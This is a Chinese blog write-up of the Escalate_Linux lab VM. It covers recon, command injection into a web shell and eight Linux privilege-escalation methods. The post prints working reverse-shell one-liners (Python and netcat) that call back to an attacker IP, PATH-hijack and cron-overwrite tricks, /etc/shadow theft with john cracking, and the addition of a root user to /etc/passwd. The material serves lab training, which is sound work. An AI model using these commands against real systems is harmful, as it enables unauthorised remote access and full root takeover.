Escalate_Linux详解

最新推荐文章于 2025-06-04 07:49:28 发布
最新推荐文章于 2025-06-04 07:49:28 发布
阅读量411 收藏 7
点赞数 6
文章标签: 网络 安全 web安全 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43433141/article/details/146309066
版权

一、主机发现

arp-scan -l

靶机ip为192.168.55.152

二、端口扫描、目录枚举+拿到低权限shell

2.1端口扫描

nmap -p- 192.168.55.152 

发现很多端口开放

2.2目录枚举

dirb http://192.168.55.152

发现没有扫描出来有用的路径

尝试爆破php后缀的路径

dirb http://192.168.55.152 -X .php

发现此路径,尝试访问

靶机给我们提示说cmd可以执行命令,尝试使用hackbar进行命令拼接

执行命令成功,此时就可以进行反弹shell了

看看靶机是不是有python

直接拼接python的反弹shell命令

http://192.168.55.152/shell.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.55.132",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

拿到低权限shell

三、提权

3.1suid提权

查看该用户能够使用的root命令,发现需要用户的密码

查找一下suid权限的命令

find / -perm -4000 -print 2>/dev/null

发现这里有一个shell文件,尝试用这个文件进行提权

进入/home/user3后直接执行该文件即可成功提权

3.2全局环境变量劫持提权

刚刚发现user5目录下有script脚本,是二进制文件

cat一下发现没有合适的命令劫持

执行该文件发现它跟ls命令效果一样,此处可以尝试使用ls的命令劫持

命令如下:

cd /tmp
echo "/bin/bash" > ls
chmod +x ls
echo $PATH
export PATH=/tmp:$PATH
cd /home/user5/
./script

3.3计划任务提权

发现用户4桌面下有一个计划任务

cat /etc/crontab

由于环境变量的问题,在user4目录下需要使用/bin/ls代替ls命令

由于没有user4的密码,所以需要先劫持环境变量更改user4的密码

cd /tmp
echo 'echo "user4:123" | chpasswd' >ls
chmod +x ls
echo $PATH
export PATH=/tmp:$PATH
cd /home/user5/
./script
su user4

使用msf生成反弹shell的命令

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.55.132 lport=8888 R

然后将生成的反弹shell命令覆盖此定时文件

echo 'mkfifo /tmp/ktnq; nc 192.168.55.132 8888 0</tmp/ktnq | /bin/sh >/tmp/ktnq 2>&1; rm /tmp/ktnq' > autoscript.sh

成功提权

3.4爆破密码直接提权

cd /tmp
echo 'cat /etc/shadow' >/tmp/ls
chmod +x ls
echo $PATH
export PATH=/tmp:$PATH
cd /home/user5/
./script

成功找到root用户的密码

使用john直接将密码爆破出来

echo 'root:$6$mqjgcFoM$X/qNpZR6gXPAxdgDjFpaD1yPIqUF5l5ZDANRTKyvcHQwSqSxX5lA7n22kjEkQhSP6Uq7cPaYfzPSmgATM9cwD1' > 1.txt
john 1.txt

直接输入密码即可

成功提权

3.5vi提权

user8对vi编辑器具有sudo权限,先将user8的密码进行修改

cd /tmp
echo 'echo "user8:123" | chpasswd' >ls
chmod +x ls
echo $PATH
export PATH=/tmp:$PATH
cd /home/user5/
./script
su user8

发现user8对vi具有高权限

sudo vi
:!sh
id

成功提权

3.6openssl提权

查看/etc/passwd,发现user7的gid为0,尝试登陆user7然后创建一个新的用户

cd /tmp
echo 'cat /etc/passwd' >ls
chmod +x ls
echo $PATH
export PATH=/tmp:$PATH
cd /home/user5/
./script

更改user7的密码

cd /tmp
echo 'echo "user7:123" | chpasswd' >ls
chmod +x ls
echo $PATH
export PATH=/tmp:$PATH
cd /home/user5/
./script
su user7

使用openssl生成新用户的密码

openssl passwd -1 -salt ysy 123

生成内容如下:

$1$ysy$FEKea8H9FLIyRztwO8UXd

在/etc/passwd中添加如下内容

echo 'ysy:$1$ysy$FEKea8H9FLIyRztwO8UXd/:0:0:/root:/bin/bash' >> /etc/passwd

直接切换ysy用户即可成功登陆

3.7sudo提权

首先修改user1的密码

cd /tmp
echo 'echo "user1:123" | chpasswd' >ls
chmod +x ls
echo $PATH
export PATH=/tmp:$PATH
cd /home/user5/
./script
su user1

查看sudo权限发现该用户权限很高,直接启动该用户的shell即可成功提权

sudo -u user1 bash
sudo su
123

3.8mysql提权

首先使用默认密码进行登录

mysql -u root -p 
root

找到数据库的账户密码

show databases;
use user;
show tables;
select * from user_info;

进入 mysql 账户

找到账号的密码

cd ~
chmod 600 .user_informations
cat .user_informations

继续寻找信息,找到root账户的密码

cd /etc/mysql
cat secret.cnf

泷羽Sec-pp
关注
渗透测试 ( 4 ) --- Meterpreter 命令详解
墨鱼菜鸡
07-11 4215
From:https://blog.youkuaiyun.com/weixin_45605352/article/details/115824811 <<Web 安全攻防(渗透测试实战指南)>> 1、初识 Meterpreter 1.1.什么是 Meterpreter   Meterpreter 是 Metasploit 框架中的一...
如何黑掉一个宇宙?一文带你详解Meterpreter后渗透模块攻击(文末赠送免费资源哦~)
weixin_46238756的博客
11-01 2062
如何黑掉一个宇宙?一文带你详解Meterpreter后渗透模块攻击(文末赠送免费资源哦~) 文末赠送超级干货哈 一.名词解释 exploit 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的 有内存溢出,网站程序漏洞利用,配置错误exploit。 payload 我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一 个反响连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只 能在目标机器上执行有限命令
黑客工具之——Metasploit(MSF)使用详解
HT_xd的博客
03-12 1001
Metasploit 是一个开源的渗透测试框架,供漏洞利用、Payload 生成、后渗透工具等功能,广泛应用于安全研究和渗透测试。msfconsole:主命令行交互界面。模块:分为exploitspayloadsauxiliarypost等类型。数据库支持:存储扫描结果和攻击数据。
Escalate_Linux靶机详解(1)
苏生要努力
02-21 680
name=xiao&pwd=123456如果你的value字符串中包含了=或者&,那么势必会造成接收U川的服务器解析错误,因此必须将引起歧义的&和=符号进行转义,也就是对其进行编码。背景:目标系统存在远程文件包含漏洞或者命令注入漏洞,想在目标设备上加载webshell,. 但不想在目标设备硬盘上留下任何webshell文件信息 (2)利用nc或python的方法反弹shell不好使用 解决思路:让目标设备从远端服务器加载webshell代码至内存执行。获得meterpreter。使用BP进行url编码。
Escalate_Linux: 1靶场渗透测试
sucker的博客
02-24 1073
Web Delivery是Metasploit框架中的一个多功能模块,主要用于通过Web服务器传递Payload,触发目标执行恶意代码,从而建立反向连接。与传统Exploit模块不同,Web Delivery不直接利用服务端漏洞,而是通过传递轻量级代码建立会话,更适合在受限环境中维持访问。:Web Delivery是一种灵活的攻击方式,结合社会工程与漏洞利用,能有效穿透多层防御。9,在网站/shell.php下执行攻击语句之后,成功的创建出一个会话,进入这个会话中,拿到靶场的原始shell。
linux内核取ret2usr,Linux内核漏洞利用技术详解 Part 2
weixin_30970539的博客
05-07 462
前言在上一篇文章中,我们不仅为读者详细介绍了如何搭建环境,还通过一个具体的例子演示了最简单的内核漏洞利用技术:ret2usr。在本文中,我们将逐步启用更多的安全防御机制,即SMEP、KPTI和SMAP,并逐一解释它们将如何影响我们的漏洞利用方法,以及如何绕过这些防御机制。启用SMEP机制SMEP简介SMEP(Supervisormode execution protection,SMEP)机制的作...
Meterpreter命令详解
sweelg的博客
05-29 2730
0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制、捕获.
Kali linux 2016.2(Rolling)中的Exploits模块详解
weixin_34376562的博客
11-08 7273
简单来讲,这个Exploits模块,就是针对不同的已知漏洞的利用程序。 root@kali:~# msfconsole Unable to handle kernel NULL pointer dereference at virtua...
代理转发工具详解
渗透测试研究中心
04-30 339
Penetration testers often traverse logical network boundaries in order to gain access to client’s critical infrastracture. Common scenarios include developing the attack into the internal network aft...
Kali linux 2016.2(Rolling)中的auxiliary模块详解
weixin_33858336的博客
11-15 1721
root@kali:~# msfconsole ______________________________________________________________________________ | ...
Game of Thrones : 利的游戏
zhaji001
01-22 5113
简介 今年利的游戏要上映最终季了,很是期待啊,争斗了那么久的位,这次终于要和异鬼开打了。 祝你好运,老神和新人会保护你! 下载URL: https://www.vulnhub.com/entry/game-of-thrones-ctf-1,201/ 靶机使用:Virtualbox 攻击机:kali linux 0x001 信息收集 kali linux 是物理机器,所以就费点事,...
暮然回首:我的10年软件开发生涯
技术zhai的博客
07-16 3247
前言我是个码农,在职场干了多年,在超过10个公司服务过,遇到过各种怪现状,拍案惊奇葩,不吐不快,太想写篇文章吐槽一下。这篇文章汇集了我10多年来的工作中遇到的各种经历,总结的心得,分别讨论了团队与协作(同事/领导/客户的交流)、技术与质量(学习、技术选择、质量)、职业与事业(现实、追求、老油条、职业道德、典故、事业/经验)、找工作(猎头/中介、应聘、简历、面试别人)、辞职(原因/理由、信任)等,干...
APM32芯得 EP.07 | 探索使用以太网(ETH),搭建一个简单的本地HTTP服务器
cheukyau的博客
06-03 569
本文分享基于APM32系列芯片的ETH模块HTTP服务实现方法。文章详细介绍了HTTP协议特点、LWIP1.4.1的轻量级HTTP服务实现,以及嵌入式Web服务器搭建步骤:1)移植LWIP库;2)使用makefsdata工具转换HTML文件;3)编写httpd_cgi_ssi.c实现SSI和CGI功能,包括ADC数据采集和LED控制;4)配置开发板静态IP地址。实验现象展示了通过网页访问开发板IP地址,实现LED控制和ADC数据采集功能。
仓颉语言---Socket编程
w_zero_one的博客
06-02 967
Socket(套接字)可以被理解为网络上两个进程之间通信的端点。它是网络通信的抽象表示,封装了底层网络协议的复杂性,为应用程序供了一个简单统一的接口。Socket 编程是一种网络编程范式,它允许不同计算机上的进程通过网络进行通信。这种通信可以发生在同一设备上的不同进程之间,也可以发生在不同地理位置的设备之间。Socket 编程供了一种标准的方式来实现网络通信,是构建各种网络应用的基础。
【计算机网络】第七章 运输层
wuyufei_sun的博客
06-03 411
物理层、数据链路层和网络层,共同解决了将主机通过异构网络互联起来所面临的问题,实现了在计算机网络中实际进行通信的真正实体,是位于通信两端主机中的进程如何为运行在供直接的逻辑通信服务,就是运输层的主要任务。运输层协议又称为端到端协议。
K-匿名模型
qq_65213554的博客
06-02 1104
K-匿名模型是一种隐私保护技术,通过数据泛化和抑制操作,确保发布数据中的每条记录至少与其他K-1条记录在准标识符(QIDs)上不可区分,防止个体被重新识别。其核心是抵御链接攻击,适用于医疗、普查等敏感数据的公开场景。虽然K-匿名平衡了数据效用与隐私,但仍面临同质性攻击、背景知识攻击等局限。后续改进模型如L-多样性和T-接近性增强了防护,但过度泛化导致的数据效用下降和动态数据失效仍是挑战。该技术直观易实现,但在实际应用中需衡隐私保护与数据分析需求。
探索Heal项目的独特魅力:高工作效率的简易指南
最新发布
weixin_44626085的博客
06-04 401
今天,我们要介绍的项目名为 “Heal”,它展示了一个完整的漏洞利用流程,从信息收集到最终获取服务器的控制,全程步步为营。在破解了用户的哈希值后,获取到了能够利用LimeSurvey 插件系统上传并安装恶意插件的限,获得了更多的对目标服务器的访问限。在开始进行安全测试之前,了解目标服务器的基本信息是非常重要的,因此Heal项目从最初的网络扫描开始,使用nmap工具发现开放的TCP端口:22(SSH)和80(HTTP)。这样的扫描在发现开放端口之后,接下来就是对服务版本的探查和可能存在漏洞的挖掘。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值